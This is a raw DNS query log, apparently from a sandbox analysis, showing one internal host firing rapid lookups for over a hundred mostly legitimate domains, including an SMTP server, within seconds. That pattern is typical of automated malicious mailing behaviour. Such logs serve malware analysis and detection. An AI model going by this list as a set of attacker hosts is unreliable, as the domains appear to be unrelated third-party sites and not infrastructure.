                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.141560078 CET192.168.2.58.8.8.80x9fa7Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.175853014 CET192.168.2.58.8.8.80xe3a7Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.209461927 CET192.168.2.58.8.8.80xf5bStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.213057041 CET192.168.2.58.8.8.80xb4aaStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.222048044 CET192.168.2.58.8.8.80xb487Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.222449064 CET192.168.2.58.8.8.80xdd91Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.232284069 CET192.168.2.58.8.8.80x246Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.249598980 CET192.168.2.58.8.8.80xfc30Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.258104086 CET192.168.2.58.8.8.80xbd19Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.300920010 CET192.168.2.58.8.8.80x8f7bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.317044973 CET192.168.2.58.8.8.80x929aStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.317044973 CET192.168.2.58.8.8.80xbfa4Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.343645096 CET192.168.2.58.8.8.80x9746Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.347863913 CET192.168.2.58.8.8.80x5bb9Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.363269091 CET192.168.2.58.8.8.80xa0c8Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.410022974 CET192.168.2.58.8.8.80xf7f3Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.421567917 CET192.168.2.58.8.8.80x4557Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.421674967 CET192.168.2.58.8.8.80x6028Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.441606045 CET192.168.2.58.8.8.80x376dStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.441606045 CET192.168.2.58.8.8.80x609cStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.473141909 CET192.168.2.58.8.8.80x4db3Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.487660885 CET192.168.2.58.8.8.80xae3fStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.502959967 CET192.168.2.58.8.8.80x4760Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.539067984 CET192.168.2.58.8.8.80x5422Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.539067984 CET192.168.2.58.8.8.80xccafStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.542418003 CET192.168.2.58.8.8.80xcb1fStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.562305927 CET192.168.2.58.8.8.80x1164Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.597938061 CET192.168.2.58.8.8.80x8191Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.597938061 CET192.168.2.58.8.8.80xec36Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.609749079 CET192.168.2.58.8.8.80x1b65Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.659583092 CET192.168.2.58.8.8.80xa7aeStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.673135042 CET192.168.2.58.8.8.80x35f8Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.675800085 CET192.168.2.58.8.8.80x364bStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.693322897 CET192.168.2.58.8.8.80xa842Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.706780910 CET192.168.2.58.8.8.80x41f7Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.718993902 CET192.168.2.58.8.8.80x2245Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.724060059 CET192.168.2.58.8.8.80xd53cStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.739274025 CET192.168.2.58.8.8.80xb478Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.742935896 CET192.168.2.58.8.8.80xd910Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.785281897 CET192.168.2.58.8.8.80xea55Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.787112951 CET192.168.2.58.8.8.80x19caStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.799243927 CET192.168.2.58.8.8.80xf771Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.813637018 CET192.168.2.58.8.8.80xdcfeStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.819844961 CET192.168.2.58.8.8.80x24e7Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.831904888 CET192.168.2.58.8.8.80x9a58Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.846875906 CET192.168.2.58.8.8.80x79f6Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.864984035 CET192.168.2.58.8.8.80x7cb2Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.878792048 CET192.168.2.58.8.8.80xf0e7Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.895961046 CET192.168.2.58.8.8.80x7534Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.909492016 CET192.168.2.58.8.8.80x5849Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.940680981 CET192.168.2.58.8.8.80xab50Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.969289064 CET192.168.2.58.8.8.80x6892Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.974531889 CET192.168.2.58.8.8.80x6f25Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.980727911 CET192.168.2.58.8.8.80xd043Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.071763039 CET192.168.2.58.8.8.80xc494Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.082530975 CET192.168.2.58.8.8.80xe210Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.110413074 CET192.168.2.58.8.8.80x1dbbStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.177635908 CET192.168.2.58.8.8.80xb769Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.188801050 CET192.168.2.58.8.8.80x4770Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.227168083 CET192.168.2.58.8.8.80x2d60Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.238706112 CET192.168.2.58.8.8.80x8105Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.258722067 CET192.168.2.58.8.8.80x4bfdStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.274209976 CET192.168.2.58.8.8.80xfc30Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.290942907 CET192.168.2.58.8.8.80x8f7bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.297796011 CET192.168.2.58.8.8.80x4d2eStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.311212063 CET192.168.2.58.8.8.80xcff8Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.313170910 CET192.168.2.58.8.8.80xfa4eStandard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.318103075 CET192.168.2.58.8.8.80x72ccStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.319529057 CET192.168.2.58.8.8.80x6ea2Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.320924997 CET192.168.2.58.8.8.80xa2f3Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.326555967 CET192.168.2.58.8.8.80x5d43Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.346399069 CET192.168.2.58.8.8.80x9746Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.396600962 CET192.168.2.58.8.8.80x599dStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.453726053 CET192.168.2.58.8.8.80x609cStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.459702969 CET192.168.2.58.8.8.80xadedStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.471738100 CET192.168.2.58.8.8.80x3e51Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.487868071 CET192.168.2.58.8.8.80x55eeStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.495872974 CET192.168.2.58.8.8.80x80c8Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.555541039 CET192.168.2.58.8.8.80x71f6Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.568469048 CET192.168.2.58.8.8.80x23b0Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.580621958 CET192.168.2.58.8.8.80x768fStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.582106113 CET192.168.2.58.8.8.80x1164Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.584773064 CET192.168.2.58.8.8.80x2917Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.593565941 CET192.168.2.58.8.8.80xec36Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.599250078 CET192.168.2.58.8.8.80x8191Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.606112957 CET192.168.2.58.8.8.80xdb6cStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.660427094 CET192.168.2.58.8.8.80x2481Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.714123011 CET192.168.2.58.8.8.80xb4cdStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.714386940 CET192.168.2.58.8.8.80x38e1Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.720788002 CET192.168.2.58.8.8.80x28e9Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.724931955 CET192.168.2.58.8.8.80xa3e7Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.908154011 CET192.168.2.58.8.8.80xc93dStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.969871998 CET192.168.2.58.8.8.80xced7Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.984029055 CET192.168.2.58.8.8.80x6f25Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:37.985208035 CET192.168.2.58.8.8.80x6892Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.035398960 CET192.168.2.58.8.8.80xc5aeStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.051219940 CET192.168.2.58.8.8.80xf4f3Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.111712933 CET192.168.2.58.8.8.80x542cStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.131433964 CET192.168.2.58.8.8.80xbf47Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.131433964 CET192.168.2.58.8.8.80xc5f6Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.133886099 CET192.168.2.58.8.8.80x7ecaStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.253999949 CET192.168.2.58.8.8.80xac93Standard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.269531965 CET192.168.2.58.8.8.80xe7e9Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.312387943 CET192.168.2.58.8.8.80x8f7bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.315498114 CET192.168.2.58.8.8.80x9946Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.364124060 CET192.168.2.58.8.8.80x51faStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.459920883 CET192.168.2.58.8.8.80x5bb4Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.471260071 CET192.168.2.58.8.8.80xadedStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.486823082 CET192.168.2.58.8.8.80x80c8Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.499847889 CET192.168.2.58.8.8.80x2721Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.499847889 CET192.168.2.58.8.8.80xd76bStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.528275013 CET192.168.2.58.8.8.80x3e63Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.633342981 CET192.168.2.58.8.8.80x77eStandard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.681417942 CET192.168.2.58.8.8.80xb892Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.717803955 CET192.168.2.58.8.8.80x62faStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.721309900 CET192.168.2.58.8.8.80xec1aStandard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.725378990 CET192.168.2.58.8.8.80x28c1Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.747308969 CET192.168.2.58.8.8.80xc38Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.831031084 CET192.168.2.58.8.8.80x7629Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.847383022 CET192.168.2.58.8.8.80x960dStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.851917028 CET192.168.2.58.8.8.80x1e2dStandard query (0)hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.864026070 CET192.168.2.58.8.8.80x484eStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.873225927 CET192.168.2.58.8.8.80x78d3Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:38.992268085 CET192.168.2.58.8.8.80x5fdcStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.001130104 CET192.168.2.58.8.8.80x6f25Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.027746916 CET192.168.2.58.8.8.80xec7dStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.082076073 CET192.168.2.58.8.8.80x93b0Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.082077026 CET192.168.2.58.8.8.80xffafStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.130223036 CET192.168.2.58.8.8.80x82daStandard query (0)www.hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.195533037 CET192.168.2.58.8.8.80xd8b5Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.265249968 CET192.168.2.58.8.8.80xfc30Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.321346045 CET192.168.2.58.8.8.80xcc5aStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.321433067 CET192.168.2.58.8.8.80x6ac7Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.343789101 CET192.168.2.58.8.8.80x9746Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.383558035 CET192.168.2.58.8.8.80xde2fStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.459018946 CET192.168.2.58.8.8.80x483aStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.533582926 CET192.168.2.58.8.8.80x3e63Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.577826977 CET192.168.2.58.8.8.80x1164Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.754559040 CET192.168.2.58.8.8.80x74fcStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.802130938 CET192.168.2.58.8.8.80x77a4Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.859031916 CET192.168.2.58.8.8.80x78d3Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.898464918 CET192.168.2.58.8.8.80x7898Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.909842968 CET192.168.2.58.8.8.80x28fdStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.954722881 CET192.168.2.58.8.8.80x201aStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:39.976267099 CET192.168.2.58.8.8.80xc009Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.001672983 CET192.168.2.58.8.8.80xe8d5Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.018991947 CET192.168.2.58.8.8.80x1c59Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.018991947 CET192.168.2.58.8.8.80xd7edStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.038314104 CET192.168.2.58.8.8.80x2755Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.081065893 CET192.168.2.58.8.8.80x6549Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.106431007 CET192.168.2.58.8.8.80xac56Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.188472033 CET192.168.2.58.8.8.80x9470Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.230142117 CET192.168.2.58.8.8.80xa27Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.254132986 CET192.168.2.58.8.8.80x8c5Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.284240961 CET192.168.2.58.8.8.80xdeebStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.286746025 CET192.168.2.58.8.8.80xd7f4Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.371217012 CET192.168.2.58.8.8.80x2b83Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.380292892 CET192.168.2.58.8.8.80xcc56Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.423031092 CET192.168.2.58.8.8.80x62f4Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.587400913 CET192.168.2.58.8.8.80x1cb0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.696470976 CET192.168.2.58.8.8.80x2a4dStandard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.705084085 CET192.168.2.58.8.8.80x890Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.746933937 CET192.168.2.58.8.8.80xa386Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.785970926 CET192.168.2.58.8.8.80xd2f7Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.805078983 CET192.168.2.58.8.8.80xf7ebStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.832216978 CET192.168.2.58.8.8.80x79d3Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.928726912 CET192.168.2.58.8.8.80x1b58Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.968657970 CET192.168.2.58.8.8.80xc009Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.993376017 CET192.168.2.58.8.8.80xd327Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.063486099 CET192.168.2.58.8.8.80x3d9fStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.130558014 CET192.168.2.58.8.8.80x4b66Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.159552097 CET192.168.2.58.8.8.80x96bStandard query (0)canmore.comA (IP address)IN (0x0001)false
